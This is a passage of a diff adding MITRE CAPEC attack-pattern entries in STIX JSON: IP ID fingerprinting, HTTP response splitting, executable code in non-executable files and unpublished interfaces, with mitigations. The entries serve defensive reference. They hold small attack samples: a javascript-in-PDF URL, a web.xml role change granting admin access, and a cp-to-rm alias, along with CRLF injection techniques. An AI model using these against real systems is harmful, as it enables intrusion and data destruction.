+ "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_extended_description": "\n The internet identification field (ID) is typically utilized for reassembling a fragmented packet. RFC791 and RFC815 discusses about IP datagrams, fragmentation and reassembly. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within the ICMP error message. There are three behaviors related to the IP ID field that can be used to distinguish remote operating systems or firmware: 1) it is echoed back identically to the bit order of the ID field in the original IP header, 2) it is echoed back, but the byte order has been reversed, or it contains an incorrect or unexpected value. Different operating systems will respond by setting the IP ID field differently within error messaging.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The ability to monitor and interact with network communications. Access to at least one host, and the privileges to interface with the network interface card." + ], + "x_capec_resources_required": [ + "A tool capable of sending/receiving UDP datagram packets from a remote system to a closed port and receive an ICMP Error Message Type 3, \"Port Unreachable.\"" + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary manipulates and injects malicious content, in the form of secret unauthorized HTTP responses, into a single HTTP response from a vulnerable or compromised back-end HTTP agent (e.g., web server) or into an already spoofed HTTP response from an adversary controlled domain/site.\n See CanPrecede relationships for possible consequences.\n ", + "external_references": [ + { + "external_id": "CAPEC-34", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/34.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-113", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/113.html" + }, + { + "external_id": "CWE-138", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/138.html" + }, + { + "external_id": "CWE-436", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/436.html" + }, + { + "description": "HTTP Response Splitting", + "external_id": "25", + "source_name": "WASC", + "url": "http://projects.webappsec.org/HTTP-Response-Splitting" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + }, + { + "description": "HTTP Response Smuggling, Beyond Security", + "external_id": "REF-117", + "source_name": "reference_from_CAPEC", + "url": "http://www.securiteam.com/securityreviews/5CP0L0AHPC.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-617", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/15-Testing_for_HTTP_Splitting_Smuggling.html" + }, + { + "description": "Robert Auger, HTTP Response Splitting, 2010, The Web Application Security Consortium", + "external_id": "REF-680", + "source_name": "reference_from_CAPEC", + "url": "http://projects.webappsec.org/w/page/13246931/HTTP%20Response%20Splitting" + } + ], + "id": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "modified": "2022-09-29T00:00:00.000Z", + "name": "HTTP Response Splitting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--8f665166-dfd1-40cb-91e8-b78bee1ceb6a", + "attack-pattern--e244a53a-8c69-462c-8ff2-900a839d48cb", + "attack-pattern--70b83583-ffe3-4e6d-b4a6-61a9b9efc346", + "attack-pattern--63f43efb-7a34-4302-b3dc-8245100fdea9", + "attack-pattern--bd4f8f46-1bc7-40a9-b15a-e36b7671cf5b", + "attack-pattern--ce92f5b9-6228-4354-8a1b-72ad7ad3bb84" + ], + "x_capec_child_of_refs": [ + "attack-pattern--9c983530-1927-43ca-addd-63d149cda4a7" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands" + ], + "Confidentiality": [ + "Execute Unauthorized Commands", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "\n In the PHP 5 session extension mechanism, a user-supplied session ID is sent back to the user within the Set-Cookie HTTP header. Since the contents of the user-supplied session ID are not validated, it is possible to inject arbitrary HTTP headers into the response body. This immediately enables HTTP Response Splitting by simply terminating the HTTP response header from within the session ID used in the Set-Cookie directive. See also: CVE-2006-0207\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey network to identify target: The adversary performs network reconnaissance by monitoring relevant traffic to identify the network path and parsing of the HTTP messages with the goal of identifying potential targets

    2. Techniques
    Scan networks to fingerprint HTTP infrastructure and monitor HTTP traffic to identify HTTP network path with a tool such as a Network Protocol Analyzer.

Experiment

  1. Identify vulnerabilities in targeted HTTP infrastructure and technologies: The adversary sends a variety of benign/ambiguous HTTP requests to observe responses from HTTP infrastructure in order to identify differences/discrepancies in the interpretation and parsing of HTTP requests by examining supported HTTP protocol versions, HTTP headers, syntax checking and input filtering.

  2. Cause differential HTTP responses by experimenting with identified HTTP Request vulnerabilities: The adversary sends maliciously crafted HTTP request to back-end HTTP infrastructure to inject adversary data (in the form of HTTP headers with custom strings and embedded web scripts and objects) into HTTP responses (intended for intermediary and/or front-end client/victim HTTP agents communicating with back-end HTTP infrastructure) for the purpose of interfering with the parsing of HTTP responses by intermediary and front-end client/victim HTTP agents. The intended consequences of the malicious HTTP request and the subsequent adversary injection and manipulation of HTTP responses to intermediary and front-end client/victim HTTP agents, will be observed to confirm applicability of identified vulnerabilities in the adversary's plan of attack.

    3. Techniques
    Continue the monitoring of HTTP traffic.
    \n Utilize different sequences of special characters (CR - Carriage Return, LF - Line Feed, HT - Horizontal Tab, SP - Space and etc.) to bypass filtering and back-end encoding and to embed:\n \n additional HTTP Requests with their own headers\n malicious web scripts into parameters of HTTP Request headers (e.g., browser cookies like Set-Cookie or Ajax web/browser object parameters like XMLHttpRequest)\n adversary chosen encoding (e.g., UTF-7)\n \n to utilize additional special characters (e.g., > and <) filtered by the target HTTP agent.\n Note that certain special characters and character encoding may be applicable only to intermediary and front-end agents with rare configurations or that are not RFC compliant.\n
    Follow an unrecognized (sometimes a RFC compliant) HTTP header with a subsequent HTTP request to potentially cause the HTTP request to be ignored and interpreted as part of the preceding HTTP request.

Exploit

  1. Perform HTTP Response Splitting attack: Using knowledge discovered in the experiment section above, smuggle a message to cause one of the consequences.

    2. Techniques
    Leverage techniques identified in the Experiment Phase.
", + "x_capec_extended_description": "\n Malicious user input is injected into various standard and/or user defined HTTP headers within a HTTP Response through use of Carriage Return (CR), Line Feed (LF), Horizontal Tab (HT), Space (SP) characters as well as other valid/RFC compliant special characters, and unique character encoding.\n A single HTTP response ends up being split as two or more HTTP responses by the targeted client HTTP agent parsing the original maliciously manipulated HTTP response. This allows malicious HTTP responses to bypass security controls in order to implement malicious actions and provide malicious content that allows access to sensitive data and to compromise applications and users. This is performed by the abuse of interpretation and parsing discrepancies in different intermediary HTTP agents (load balancer, reverse proxy, web caching proxies, application firewalls, etc.) or client HTTP agents (e.g., web browser) in the path of the malicious HTTP responses.\n This attack is usually the result of the usage of outdated or incompatible HTTP protocol versions as well as lack of syntax checking and filtering of user input in the HTTP agents receiving HTTP messages in the path.\n This differs from CAPEC-105 HTTP Request Splitting, which is usually an attempt to compromise a back-end HTTP agent via HTTP Request messages. HTTP Response Splitting is an attempt to compromise aclient agent (e.g., web browser)by sending malicious content in HTTP responses from back-end HTTP infrastructure.\n HTTP Smuggling (CAPEC-33 and CAPEC-273) is different from HTTP Splitting due to the fact it relies upon discrepancies in the interpretation of various HTTP Headers and message sizes and not solely user input of special characters and character encoding. HTTP Smuggling was established to circumvent mitigations against HTTP Request Splitting techniques.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_peer_of_refs": [ + "attack-pattern--b89511b6-f0fb-4c1d-a884-a0d5a0d82b4e" + ], + "x_capec_prerequisites": [ + "A vulnerable or compromised server or domain/site capable of allowing adversary to insert/inject malicious content that will appear in the server's response to target HTTP agents (e.g., proxies and users' web browsers).", + "Differences in the way the two HTTP agents parse and interpret HTTP requests and its headers.", + "HTTP headers capable of being user-manipulated.", + "HTTP agents running on HTTP/1.0 or HTTP/1.1 that allow for Keep Alive mode, Pipelined queries, and Chunked queries and responses." + ], + "x_capec_resources_required": [ + "Tools capable of monitoring HTTP messages, and crafting malicious HTTP messages and/or injecting malicious content into HTTP messages." + ], + "x_capec_skills_required": { + "Medium": "Possess knowledge on the exact details in the discrepancies between several targeted HTTP agents in path of an HTTP message in parsing its message structure and individual headers." + }, + "x_capec_status": "Stable", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d1e771e5-938f-4d0e-932e-1692f77db9a1", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--94b24ec6-eaed-40ba-aa65-789101ea9a55", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3673e571-3d09-4ddf-9967-8a14983e4523", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--64555d1a-a57e-49d9-b9f8-02c843ba1af5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--0622cdd8-6ce2-45fc-bfcc-19d3b91d4536", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--0bc589af-7ac3-4771-b1db-defb88ba61b5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--38c9102d-b93d-4484-8efb-aa67b53572c8", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--65a59d08-b52c-4c78-b802-6e65c65f02e5", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--c7c66359-57b8-4f29-8d2b-5d5ef075f5f5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--948de9b9-7ad6-4bf5-8daf-f2208db360d6", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e76fd999-0f43-460b-95fb-cb047a2a7f4d", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--4bd16590-2382-4a10-9712-f28b7bf84fec", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--23a58aa1-dfcb-4295-a673-b44c0cba6264", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--5cc83b32-2b3e-41e5-94e8-2e2ea48bf660", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--eed85688-d26a-4cec-8582-4ad1e158cdb3", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--43085d5c-cd1e-4175-9d44-f28f8f3cc5f9", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d4993c4a-c91f-4a57-9f21-3fe59ccbe5c4", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--50ea55ae-d8a8-4279-9dc9-05b6fb416b84", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d73cbb1d-c8db-4b8e-8ae6-32f0d436b1d5", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a2e15722-f07d-44db-b988-af501e0f1e13", + "target_ref": "attack-pattern--ba694895-a0cf-494e-ace2-bf3488330b80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.", + "external_references": [ + { + "external_id": "CAPEC-35", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/35.html" + }, + { + "external_id": "CWE-94", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/94.html" + }, + { + "external_id": "CWE-96", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/96.html" + }, + { + "external_id": "CWE-95", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/95.html" + }, + { + "external_id": "CWE-97", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/97.html" + }, + { + "external_id": "CWE-272", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/272.html" + }, + { + "external_id": "CWE-59", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/59.html" + }, + { + "external_id": "CWE-282", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/282.html" + }, + { + "external_id": "CWE-270", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/270.html" + }, + { + "description": "Obfuscated Files or Information: HTML Smuggling", + "external_id": "T1027.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/006" + }, + { + "description": "Obfuscated Files or Information: Embedded Payloads", + "external_id": "T1027.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/009" + }, + { + "description": "Hide Artifacts: Resource Forking", + "external_id": "T1564.009", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1564/009" + }, + { + "description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley", + "external_id": "REF-1", + "source_name": "reference_from_CAPEC" + } + ], + "id": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Leverage Executable Code in Non-Executable Files", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--7f2c0e10-0afe-4edf-bb23-43d6f29ec932" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Gain Privileges" + ], + "Integrity": [ + "Execute Unauthorized Commands (Run Arbitrary Code)", + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "Virtually any system that relies on configuration files for runtime behavior is open to this attack vector. The configuration files are frequently stored in predictable locations, so an attacker that can fingerprint a server process such as a web server or database server can quickly identify the likely locale where the configuration is stored. And this is of course not limited to server processes. Unix shells rely on profile files to store environment variables, search paths for programs and so on. If the aliases are changed, then a standard Unix \"cp\" command can be rerouted to \"rm\" or other standard command so the user's intention is subverted.", + "The attack can be directed at a client system, such as causing buffer overrun through loading seemingly benign image files, as in Microsoft Security Bulletin MS04-028 where specially crafted JPEG files could cause a buffer overrun once loaded into the browser.", + "\n Another example targets clients reading pdf files. In this case the attacker simply appends javascript to the end of a legitimate url for a pdf (http://www.gnucitizen.org/blog/danger-danger-danger/)\n http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here\n The client assumes that they are reading a pdf, but the attacker has modified the resource and loaded executable javascript into the client's browser process.\n ", + "\n The attack can also target server processes. The attacker edits the resource or configuration file, for example a web.xml file used to configure security permissions for a J2EE app server, adding role name \"public\" grants all users with the public role the ability to use the administration functionality.\n < security-constraint>Security processing rules for admin screens/admin/*POSTGETadministratorpublic\n \n \n \n The server trusts its configuration file to be correct, but when they are manipulated, the attacker gains full control.\n " + ], + "x_capec_likelihood_of_attack": "High", + "x_capec_peer_of_refs": [ + "attack-pattern--521348c2-b1df-492f-ac83-1f3ffe102046", + "attack-pattern--08c74bd3-c5ad-4d6c-a8bb-bb93d7503ddb" + ], + "x_capec_prerequisites": [ + "The attacker must have the ability to modify non-executable files consumed by the target software." + ], + "x_capec_resources_required": [ + "Ability to communicate synchronously or asynchronously with server that publishes an over-privileged directory, program, or interface. Optionally, ability to capture output directly through synchronous communication or other method such as FTP." + ], + "x_capec_skills_required": { + "Low": "To identify and execute against an over-privileged system interface" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--1200590e-b7be-4a04-ba62-ad7e096eb725", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--8bc84555-2eda-4653-91db-ab12268de92f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--16c78c78-dace-4fe3-ac4a-aaf188d14af5", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--56425426-27c4-48cd-b76a-d1b3019fa7ab", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--8fb32cf0-80fd-4e8b-91c6-0908041d5b6e", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement host integrity monitoring to detect any unwanted altering of configuration files.", + "id": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a6e454f6-6551-4cd7-9eab-0d1493966d59", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--601142e9-0c7b-4920-a60c-6abe2514f692", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Ensure that files that are not required to execute, such as configuration files, are not over-privileged, i.e. not allowed to execute.", + "id": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-35-4", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--96960c02-bdf9-412d-94b3-3cc4487c9b4f", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2e6ab888-a935-4b5d-9efa-891f4cdf1b32", + "target_ref": "attack-pattern--9a7c6cbc-e3f9-4925-992e-f07e1359de87", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary searches for and invokes interfaces or functionality that the target system designers did not intend to be publicly available. If interfaces fail to authenticate requests, the attacker may be able to invoke functionality they are not authorized for.", + "external_references": [ + { + "external_id": "CAPEC-36", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/36.html" + }, + { + "external_id": "CWE-306", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/306.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "external_id": "CWE-695", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/695.html" + }, + { + "external_id": "CWE-1242", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1242.html" + } + ], + "id": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Using Unpublished Interfaces or Functionality", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f4186110-0c20-42fa-bc6f-d0ff9f700f91" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Read Data", + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "To an extent, Google services (such as Google Maps) are all well-known examples. Calling these services, or extending them for one's own (perhaps very different) purposes is as easy as knowing they exist. Their unencumbered public use, however, is a purposeful aspect of Google's business model. Most organizations, however, do not have the same business model. Organizations publishing services usually fall back on thoughts that Attackers \"will not know services exist\" and that \"even if they did, they wouldn't be able to access them because they're not on the local LAN.\" Simple threat modeling exercises usually uncovers simple attack vectors that can invalidate these assumptions." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify services: Discover a service of interest by exploring service registry listings or by connecting on a known port or some similar means.

    2. Techniques
    Search via internet for known, published services.
    Use automated tools to scan known ports to identify internet-enabled services.
    Dump the code from the chip and then perform reverse engineering to analyze the code.

  2. Authenticate to service: Authenticate to the service, if required, in order to explore it.

    3. Techniques
    Use published credentials to access system.
    Find unpublished credentials to access service.
    Use other attack pattern or weakness to bypass authentication.

  3. Identify all interfaces: Determine the exposed interfaces by querying the registry as well as probably sniffing to expose interfaces that are not explicitly listed.

    4. Techniques
    For any published services, determine exposed interfaces via the documentation provided.
    For any services found, use error messages from poorly formed service calls to determine valid interfaces. In some cases, services will respond to poorly formed calls with valid ones.

Experiment

  1. Attempt to discover unpublished functions: Using manual or automated means, discover unpublished or undocumented functions exposed by the service.

    2. Techniques
    Manually attempt calls to the service using an educated guess approach, including the use of terms like' 'test', 'debug', 'delete', etc.
    Use automated tools to scan the service to attempt to reverse engineer exposed, but undocumented, features.

Exploit

  1. Exploit unpublished functions: Using information determined via experimentation, exploit the unpublished features of the service.

    2. Techniques
    Execute features that are not intended to be used by general system users.
    Craft malicious calls to features not intended to be used by general system users that take advantage of security flaws found in the functions.
", + "x_capec_extended_description": "Adversaries can also search for undocumented bits on a hardware device, commonly known as \"chicken bits\". These bits are used to enable/disable certain functionality, but are not published. Adversaries can reverse engineer firmware to identify hidden features and change these bits at runtime to achieve malicious behavior.", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The architecture under attack must publish or otherwise make available services that clients can attach to, either in an unauthenticated fashion, or having obtained an authentication token elsewhere. The service need not be 'discoverable', but in the event it isn't it must have some way of being discovered by an attacker. This might include listening on a well-known port. Ultimately, the likelihood of exploit depends on discoverability of the vulnerable service." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack. Web service digging tools may be helpful." + ], + "x_capec_skills_required": { + "Low": "A number of web service digging tools are available for free that help discover exposed web services and their interfaces. In the event that a web service is not listed, the attacker does not need to know much more in addition to the format of web service messages that they can sniff/monitor for." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Authenticating both services and their discovery, and protecting that authentication mechanism simply fixes the bulk of this problem. Protecting the authentication involves the standard means, including: 1) protecting the channel over which authentication occurs, 2) preventing the theft, forgery, or prediction of authentication credentials or the resultant tokens, or 3) subversion of password reset and the like.", + "id": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-36-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fa411755-d981-4b14-9dbc-aed949041db7", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a7decf96-7bb3-45ee-bb7d-833b443b59ed", + "target_ref": "attack-pattern--d0db3641-ee0d-4897-89aa-3c85c69377a5", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker examines a target system to find sensitive data that has been embedded within it. This information can reveal confidential contents, such as account numbers or individual keys/credentials that can be used as an intermediate step in a larger attack.", + "external_references": [ + { + "external_id": 